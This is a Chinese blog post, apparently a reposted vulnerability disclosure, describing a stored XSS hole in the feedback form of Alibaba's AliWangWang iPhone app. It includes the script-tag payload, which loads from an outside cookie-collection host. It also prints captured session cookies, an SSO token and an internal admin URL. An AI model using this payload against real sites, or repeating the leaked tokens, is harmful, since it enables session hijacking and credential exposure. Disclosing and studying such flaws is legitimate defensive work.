关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

阿里巴巴存在储存型xss漏洞可获得cookies

 feng  914 ℃  0条点评

发现漏洞后提交到乌云了,今天阿里巴巴确认了,就发到博客吧。

简要描述:

xss漏洞,大家都懂的,可获得cookies

详细说明:

只是抱着试试看的态度,没想到真的出现了...
该漏洞是出现在阿里旺旺的手机客户端,由于我同时测试的旺信和阿里旺旺两个软件,都属于阿里巴巴,所以不知道是哪一个出现的。为了安全,没再测试,直接来提交了。
测试版本为手机iphone版,
在软件的【反馈】里写入xss测试代码,
<script src="http://xss.sh3llc0de.com/?u=ddc05c"></script>
提交成功。
十分钟之内没有收到cookies,就失望了,但刚才去看了看...哈哈。

漏洞证明:

ali.png
信息
IP:121.0.29.205
地址:中国浙江杭州电信企业阿里巴巴公司
操作系统:Windows XP
浏览器:Chrome 24.0.1312.52
时间:2013-01-22 19:06:45

cookies

USER_COOKIE=BDC4D499AACAC40F7021847DB20A7620; SSO_TOKEN=594E51ADB89572C8F71E9C45F25A3684020D1640DEDF9946EAD585C231395E6711ED2B70672DF1

CDFC2D299A49F5CB04; LAST_HEART_BEAT_TIME=9411E114E035D380C6A967891863C6D3; JSESSIONID=1g8tf43ade2j2e8ihhzxm20lk

 

地址:http://mops.alibaba-inc.com/usersuggestion/index.do?pageIndex=2&source=ios&whiltelist=false

没什么技术含量,纯属盲打,期待阿里巴巴的礼物...

本文标签:
javascript代码转换16进制编码-在线工具
任意文件上传漏洞可批量拿shell
Joy:一款用于捕获和分析网络内部流量数据的工具Joy:一款用于捕获和分析网络内部流量数据的工具One-Lin3r:懒人的福音,渗透测试单行化工具One-Lin3r:懒人的福音,渗透测试单行化工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具国产网站恶意代码监测(网马监控)工具优化版国产网站恶意代码监测(网马监控)工具优化版

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码